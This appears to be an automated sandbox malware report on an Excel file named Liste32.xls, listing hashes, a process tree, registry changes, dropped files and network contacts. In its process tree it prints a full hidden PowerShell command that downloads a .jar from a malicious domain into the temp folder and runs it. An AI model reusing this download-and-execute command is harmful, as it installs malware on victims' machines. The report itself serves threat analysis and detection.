File name: | Liste32.xls |
Full analysis: | https://app.any.run/tasks/bf1af4e1-1986-4b04-865c-c192b4f72592 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 15:39:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | Non-ISO extended-ASCII text, with CRLF line terminators |
MD5: | C4799E99A141907C3603F282D747BDCC |
SHA1: | 67ED5B3525F77C8ACD260B813D69EDB6CDE2DE2B |
SHA256: | A6F4450A2B5414E6949A3979F9E1BE0F51D4B47BB8FCFA4DA05EFD4E2AEA6CCC |
SSDEEP: | 192:LrY5m+l1dLiAjl0cr6kNecgR8OCFkwTLfWhPRTNTRZdjxxeyLbaBH:LYLl1dljlZr5NtUwTLiR1RZdv4H |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3464 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 Modules
| |||||||||||||||
3364 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://specforce.space\" ,\" %temp%\\szEAq7.jar\") }" & %temp%\\szEAq7.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3892 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://specforce.space\" ,\" C:\Users\admin\AppData\Local\Temp\\szEAq7.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2968 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\szEAq7.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE | |||||||||||
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 1 Version: 8.0.920.14 Modules
|
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | 0! |
Value: 20302100880D0000010000000000000000000000 | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
Operation: | write | Name: | MTTT |
Value: 880D00005889F9F6798DD40100000000 | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete value | Name: | 0! |
Value: 20302100880D0000010000000000000000000000 | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (3464) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13A8E6 |
Operation: | write | Name: | 13A8E6 |
Value: 04000000880D00002D00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004C006900730074006500330032002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000703EEAF7798DD401E6A81300E6A8130000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3464 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4A0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GPPQ9FD7DUPSBS4LFDC2.temp | — | |
MD5:— | SHA256:— | |||
3892 | powershell.exe | C:\Users\admin\AppData\Local\Temp\szEAq7.jar | html | |
MD5:5ABAE3918EB0655D3D5DA21309EA53EA | SHA256:1AA3EBEEAD265DCCCA26DC620EA708A7AD6BBE89083A38349C24EE74C3FE7E11 | |||
3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF143075.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3892 | powershell.exe | GET | 302 | 162.255.119.197:80 | http://specforce.space/ | US | html | 57 b | suspicious |
3892 | powershell.exe | GET | 200 | 198.54.117.212:80 | http://www.specforce.space/?from=@ | US | html | 4.79 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3892 | powershell.exe | 198.54.117.212:80 | www.specforce.space | Namecheap, Inc. | US | malicious |
3892 | powershell.exe | 162.255.119.197:80 | specforce.space | Namecheap, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
specforce.space |
| suspicious |
www.specforce.space |
| malicious |